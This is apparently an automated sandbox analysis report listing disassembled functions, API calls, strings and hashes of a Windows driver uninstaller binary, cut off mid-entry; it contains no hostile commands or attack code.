                                  • Instruction Fuzzy Hash: F80184B27043046BD620EB55DC41FABB398AB84704F80482EB709A71C2DA78A908C7AD
                                  Function 00406D10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00406D65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: ClassType$Enum\%s\{*%s}\{*}$UninstCommandClass::NvRemoveDevice9x
                                  • API String ID: 4132451974-3371136729
                                  • Opcode ID: 761aa2ff1d3467103dd0f9a319020157a8370435b6b8692b61744074985d226a
                                  • Instruction ID: 27f569d5d0ccdbbc76c341d2a13642771d9cab453b4ffff5a5160c611d188230
                                  • Opcode Fuzzy Hash: 761aa2ff1d3467103dd0f9a319020157a8370435b6b8692b61744074985d226a
                                  • Instruction Fuzzy Hash: D5F0F9B2744304A7E224EB559C83FEFB39CEB95704F40042EBA54631C1DAB97450C79E
                                  Function 00408280 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082A3
                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004082AE
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringTimeWide_fputs$AllocDebugFormatLocalMutexObjectOutputReleaseSingleWait_fprintf
                                  • String ID: AnsiToBstr
                                  • API String ID: 8724780-1849704726
                                  • Opcode ID: 9ed5390929649925233e660083f696e234fffb5375bd25bc75dc5639fbd0ca64
                                  • Instruction ID: 8d5ee0fad1c78d85e704510bbf8349316a53557d27303e09c88117ec3dd59bdb
                                  • Opcode Fuzzy Hash: 9ed5390929649925233e660083f696e234fffb5375bd25bc75dc5639fbd0ca64
                                  • Instruction Fuzzy Hash: F6F06D753812187BE1201A56AC4AF6B7E5CDB86FEBF110039FA05AA2C0CA616C0082F9
                                  Function 00407900 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 004077E0: _memset.LIBCMT ref: 0040781E
                                    • Part of subcall function 004077E0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040782A
                                    • Part of subcall function 004077E0: Process32First.KERNEL32 ref: 00407848
                                    • Part of subcall function 004077E0: _memset.LIBCMT ref: 0040786B
                                    • Part of subcall function 004077E0: Process32Next.KERNEL32(00000000,?), ref: 004078B8
                                    • Part of subcall function 004077E0: CloseHandle.KERNEL32(00000000), ref: 004078C2
                                  • OpenProcess.KERNEL32(00000001,00000000,00000000), ref: 00407926
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040792F
                                  • Sleep.KERNEL32(00000064), ref: 00407937
                                  Strings
                                  • UninstCommandClass::KillApp, xrefs: 00407902
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProcessProcess32Time_fputs_memset$CloseCreateDebugFirstFormatHandleLocalMutexNextObjectOpenOutputReleaseSingleSleepSnapshotStringTerminateToolhelp32Wait_fprintf
                                  • String ID: UninstCommandClass::KillApp
                                  • API String ID: 592201866-3161127752
                                  • Opcode ID: ad0262441aecfb30931c86f9def02b7beeb4972ebadc044afd77f1dc898b782c
                                  • Instruction ID: f0bdc80f35481e6d47beda704196ee30fc7964a7d9d44595efdd20e0878c7a57
                                  • Opcode Fuzzy Hash: ad0262441aecfb30931c86f9def02b7beeb4972ebadc044afd77f1dc898b782c
                                  • Instruction Fuzzy Hash: D3E092716442002BF21027A65C0AF9F655D9B85B50F10443AB601A61D0CAF8A81082EE
                                  Function 00404830 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?,004048C8,?,?,00000000), ref: 00404837
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID: FALSE$TRUE$UninstCommandClass::NvFileExists(%s) = %s
                                  • API String ID: 3188754299-4008997080
                                  • Opcode ID: 75fd1acee6e52dc9bb704b66aade8091afd42a7c390ee24d7c7f7df6a3ace932
                                  • Instruction ID: 6e0f79f24171f8c1e55bf2d733d9dde36a2e79a281ba165351ae31cff50a51f3
                                  • Opcode Fuzzy Hash: 75fd1acee6e52dc9bb704b66aade8091afd42a7c390ee24d7c7f7df6a3ace932
                                  • Instruction Fuzzy Hash: DBD05EBB9922213B810026186C099DB2B5CDA6A3757188627F574A32D1C32C8D9186ED
                                  Function 0040EF1D Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EF1F
                                    • Part of subcall function 0040EDEF: TlsGetValue.KERNEL32(?,0040EF32,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDF6
                                    • Part of subcall function 0040EDEF: TlsSetValue.KERNEL32(00000000,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE17
                                  • __calloc_crt.LIBCMT ref: 0040EF41
                                    • Part of subcall function 00411A9E: __calloc_impl.LIBCMT ref: 00411AAC
                                    • Part of subcall function 00411A9E: Sleep.KERNEL32(00000000,0040B4E2,?), ref: 00411AC3
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                    • Part of subcall function 0040EE5E: GetModuleHandleA.KERNEL32(KERNEL32.DLL,004232D8,0000000C,0040EF6F,00000000,00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE6F
                                    • Part of subcall function 0040EE5E: GetProcAddress.KERNEL32(0040B4E2,EncodePointer), ref: 0040EEA3
                                    • Part of subcall function 0040EE5E: GetProcAddress.KERNEL32(0040B4E2,DecodePointer), ref: 0040EEB3
                                    • Part of subcall function 0040EE5E: InterlockedIncrement.KERNEL32(004253E8), ref: 0040EED5
                                    • Part of subcall function 0040EE5E: __lock.LIBCMT ref: 0040EEDD
                                    • Part of subcall function 0040EE5E: ___addlocaleref.LIBCMT ref: 0040EEFC
                                  • GetCurrentThreadId.KERNEL32 ref: 0040EF71
                                  • SetLastError.KERNEL32(00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EF89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                  • String ID:
                                  • API String ID: 1081334783-0
                                  • Opcode ID: bfb34ff8dc526264396421ea703d918cba0adb31e3f881183263d25de58d3db7
                                  • Instruction ID: d3cdcb126fcd1d7e44b7a09d32021fedd7d5f7244c5438f10bb1313c8522f412
                                  • Opcode Fuzzy Hash: bfb34ff8dc526264396421ea703d918cba0adb31e3f881183263d25de58d3db7
                                  • Instruction Fuzzy Hash: 3DF0F4336447226AD63537766C0AA9B2A50DF107B1B910A3AF445A61E0DF39881242DC
                                  Function 00410157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __calloc_crt
                                  • String ID: ^B
                                  • API String ID: 3494438863-2078723988
                                  • Opcode ID: bce26a3884276a6bc372267229b5dd4c29e42934376e6d3cfa2379c246222086
                                  • Instruction ID: e2782df15eda121c407186b6bb38160645089ce91b4bf0615f2ee122dfe765c7
                                  • Opcode Fuzzy Hash: bce26a3884276a6bc372267229b5dd4c29e42934376e6d3cfa2379c246222086
                                  • Instruction Fuzzy Hash: 7211A7713456146BE7248F2DBC806F63795FB84724B64422BE605D73A0E7BD9CC2458C
                                  Function 00406550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI(?,?,?,00000020,00000000), ref: 004065CC
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::GetInfClassGUID, xrefs: 00406564
                                  • GetInfClassGUID: invalid number of arguments, xrefs: 00406586
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$ClassDebugFormatLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_sprintf
                                  • String ID: GetInfClassGUID: invalid number of arguments$UninstCommandClass::GetInfClassGUID
                                  • API String ID: 4252913100-1720982049
                                  • Opcode ID: 3e626c01513031550440bd5f6f895be0bf48a645fe811a8c96a7b68f9b68beee
                                  • Instruction ID: 159cbe0355e34aa1c12b4fa25a8b128b2fd6268b438e2e27a615eccc31588d3f
                                  • Opcode Fuzzy Hash: 3e626c01513031550440bd5f6f895be0bf48a645fe811a8c96a7b68f9b68beee
                                  • Instruction Fuzzy Hash: D811C4B27042406BD204EB299C42F6FB7E8AFD5718F40053FF54A97281DA799905C7AA
                                  Function 00409FC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI(?,?,?,00000020,00000000), ref: 0040A048
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • InstallDriverEx: invalid number of arguments, xrefs: 00409FF6
                                  • UninstCommandClass::InstallDriverEx, xrefs: 00409FD4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$ClassDebugFormatLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_sprintf
                                  • String ID: InstallDriverEx: invalid number of arguments$UninstCommandClass::InstallDriverEx
                                  • API String ID: 4252913100-2878319403
                                  • Opcode ID: 9d0875dde92ef2f5b3af12b6278f124552041a1a1764df12b36347e640c60666
                                  • Instruction ID: b7685094cd2f6f49914f09b2f22ac1c196fdde7b70f953bfb74ac35dc5d71e2c
                                  • Opcode Fuzzy Hash: 9d0875dde92ef2f5b3af12b6278f124552041a1a1764df12b36347e640c60666
                                  • Instruction Fuzzy Hash: CB112EB2300700BBD210AB658C46F5FB7E8ABD5714F40053FF246661C2D9B8A905C79E
                                  Function 00406EE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32 ref: 00406F3E
                                  • SendMessageA.USER32(?,0000102D,?,?), ref: 00406F6B
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  • UninstCommandClass::CompareListTitlesCallBack, xrefs: 00406EFD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSendTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: UninstCommandClass::CompareListTitlesCallBack
                                  • API String ID: 501987998-1232878459
                                  • Opcode ID: a8b81f152b955c766df272f3090a3ddb6fc9f0c9fba4c5e051ccafc932d907d3
                                  • Instruction ID: 7d3b121fdab55ea9b6f3e8fc7f765e27bc7273f3e332872f4f3b8a74f26717f5
                                  • Opcode Fuzzy Hash: a8b81f152b955c766df272f3090a3ddb6fc9f0c9fba4c5e051ccafc932d907d3
                                  • Instruction Fuzzy Hash: 9B11E8B15143409BD320DB95C855BEBB7E8BFC8304F404A2EF58997290D7B9A508CB96
                                  Function 00401820 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
